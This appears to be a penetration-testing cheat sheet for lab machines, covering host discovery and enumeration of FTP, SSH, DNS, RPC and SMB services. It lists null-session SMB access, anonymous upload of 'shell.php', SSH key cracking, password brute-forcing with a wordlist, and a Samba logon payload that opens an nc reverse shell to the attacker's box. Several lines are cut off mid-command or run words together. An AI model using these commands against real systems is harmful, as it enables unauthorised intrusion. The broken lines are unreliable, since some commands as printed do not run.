,Enumeration
Port Scanning :
1 nmap -sC -sV -o nmap -A -T5 10.10.10.x
2
3 Host Discovery
4 • nmap -sn 10.10.1.1-254 -vv -oA hosts
5 • netdiscover -r 10.10.10.0/24
6
7 DNS server discovery
8 • nmap -p 53 10.10.10.1-254 -vv -oA dcs
9
10 NSE Scripts Scan
11 * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blo
12
13 Port specific NSE script list :
14
15 ls /usr/share/nmap/scripts/ssh*
16 ls /usr/share/nmap/scripts/smb*
Scanning all 65535 ports :
1 masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
2 ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | so
3 nmap -Pn -sV -sC -p$ports 10.10.10.x
4
5 Running specific NSE scripts :
6 nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A
sC - default scripts, sV - scan for versions, oA- output all formats
Optional - sT (performs full scan instead of syn-scan to prevent getting flagged by firewalls) From
Apache Version to finding Ubuntu version -> ubuntu httpd versions
FTP : (Port 21)
, anonymous login checkftp
<ip address>
username : anonymouspwd :
anonymous
file upload -> put shell.php
SSH : (Port 22)
id_rsa.pub : Public key that can be used in authorized_keys for login
id_rsa : Private key that is used for login. Might ask for password. can be cracked withand john
ssh2john
id_rsa
ssh -i id_rsa user@10.10.10.x
For passwordless login, add id_rsa.pub to target's authorized_keysssh2john
DNS Zone transfer check : (Port 53)
If port 53 is open
Add host to /etc/hosts
dig axfr smasher.htb @10.10.10.135 https://
ghostphisher.github.io/smasher2
Add the extracted domain to /etc/hosts and dig again
RPC Bind (111)
1 rpcclient --user="" --command=enumprivs -N 10.10.10.10
2 rpcinfo –p 10.10.10.10
3 rpcbind -p 10.10.10.10
RPC (135)
1 rpcdump.py 10.11.1.121 -p 135
, 2 rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np // get pipe names
3
4 rpcmap.py ncacn_ip_tcp:10.11.1.121[135]
SMB (139 & 445)
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
1 nmap --script smb-protocols 10.10.10.10
2
3 smbclient -L //10.10.10.10
4 smbclient -L //10.10.10.10 -N // No password (SMB Null session)
5 smbclient --no-pass -L 10.10.10.10
6 smbclient //10.10.10.10/share_name
7
8 smbmap -H 10.10.10.10
9 smbmap -H 10.10.10.10 -u '' -p ''
10 smbmap -H 10.10.10.10 -s share_name
11
12 crackmapexec smb 10.10.10.10 -u '' -p '' --shares
13 crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares
14 crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares
15 crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name
16
17 enum4linux -a 10.10.10.10
18
19 rpcclient -U "" 10.10.10.10
20 * enumdomusers
21 * enumdomgroups
22 * queryuser [rid]
23 * getdompwinfo
24 * getusrdompwinfo [rid]
25
26 ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v
27
28 mount -t cifs "//10.1.1.1/share/" /mnt/wins
29
30 mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gi
31
32 SMB Shell to Reverse Shell :
33
34 smbclient -U "username%password" //192.168.0.116/sharename
35 smb> logon “/=nc ‘attack box ip’ 4444 -e /bin/bash"
36
37 Checklist :
38 * Samba symlink directory traversal attack